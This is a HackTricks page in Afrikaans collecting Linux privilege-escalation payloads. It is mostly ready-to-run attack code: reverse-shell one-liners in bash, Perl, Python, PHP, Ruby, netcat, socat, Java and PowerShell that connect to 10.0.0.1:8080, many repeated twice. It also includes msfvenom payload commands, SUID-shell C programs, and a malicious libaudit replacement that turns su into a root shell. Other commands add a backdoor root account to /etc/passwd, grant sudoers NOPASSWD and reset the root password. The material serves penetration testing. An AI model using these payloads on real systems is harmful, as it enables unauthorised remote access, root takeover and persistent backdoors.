hacktricks/linux-hardening/privilege-escalation/payloads-to-execute.md

Vervullings om uit te voer

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

• Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die SUBSCRIPTION PLANS!
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Kry die amptelike PEASS & HackTricks swag
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
• Deel jou hacktruuks deur PR's in te dien by die hacktricks repo en hacktricks-cloud repo.

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

Uitvoeringsladinge

Hier is 'n lys van nuttige uitvoeringsladinge wat gebruik kan word vir voorregverhoging in Linux-stelsels:

Bash

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 8080

Socat

socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

xterm -display 10.0.0.1:1

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Metasploit

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf

Socat (Metasploit)

msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf

Python (Metasploit)

msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py

PHP (Metasploit)

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php

Ruby (Metasploit)

msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb

Netcat (Metasploit)

msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh

Java (Metasploit)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp

War (Metasploit)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war

Python (PentestMonkey)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP (PentestMonkey)

php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby (PentestMonkey)

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat (PentestMonkey)

nc -e /bin/sh 10.0.0.1 8080

Socat (PentestMonkey)

socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane

Java (PentestMonkey)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm (PentestMonkey)

xterm -display 10.0.0.1:1

PowerShell (PentestMonkey)

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Metasploit (PentestMonkey)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf

Socat (Metasploit) (PentestMonkey)

msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf

Python (Metasploit) (PentestMonkey)

msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py

PHP (Metasploit) (PentestMonkey)

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php

Ruby (Metasploit) (PentestMonkey)

msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb

Netcat (Metasploit) (PentestMonkey)

msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh

Java (Metasploit) (PentestMonkey)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp

War (Metasploit) (PentestMonkey)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war

//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}

//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}

// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}

Oorskryf 'n lêer om voorregte te verhoog

Gewone lêers

• Voeg 'n gebruiker met 'n wagwoord by in /etc/passwd
• Verander die wagwoord binne /etc/shadow
• Voeg 'n gebruiker by in sudoers in /etc/sudoers
• Misbruik docker deur die docker-socket, gewoonlik in /run/docker.sock of /var/run/docker.sock

Oorskryf 'n biblioteek

Kyk na 'n biblioteek wat deur 'n sekere binêre lêer gebruik word, in hierdie geval /bin/su:

ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)

In hierdie geval gaan ons probeer om /lib/x86_64-linux-gnu/libaudit.so.1 na te boots.
Dus, kyk vir funksies van hierdie biblioteek wat deur die su binêre lêer gebruik word:

objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000              audit_open
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd

Die simbole audit_open, audit_log_acct_message, audit_log_acct_message en audit_fd is waarskynlik afkomstig van die libaudit.so.1-biblioteek. Aangesien die libaudit.so.1 oorskryf sal word deur die skadelike gedeelde biblioteek, moet hierdie simbole teenwoordig wees in die nuwe gedeelde biblioteek, anders sal die program nie in staat wees om die simbool te vind en sal dit afsluit.

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

void inject()__attribute__((constructor));

void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

Nou, deur eenvoudig /bin/su te roep, sal jy 'n skul as root verkry.

Skripte

Kan jy maak dat root iets uitvoer?

www-data na sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Verander root wagwoord

echo "root:hacked" | chpasswd

Voeg 'n nuwe root-gebruiker by in /etc/passwd

echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

• Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die SUBSCRIPTION PLANS!
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Kry die amptelike PEASS & HackTricks swag
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
• Deel jou hacking-truuks deur PR's in te dien by die hacktricks repo en hacktricks-cloud repo.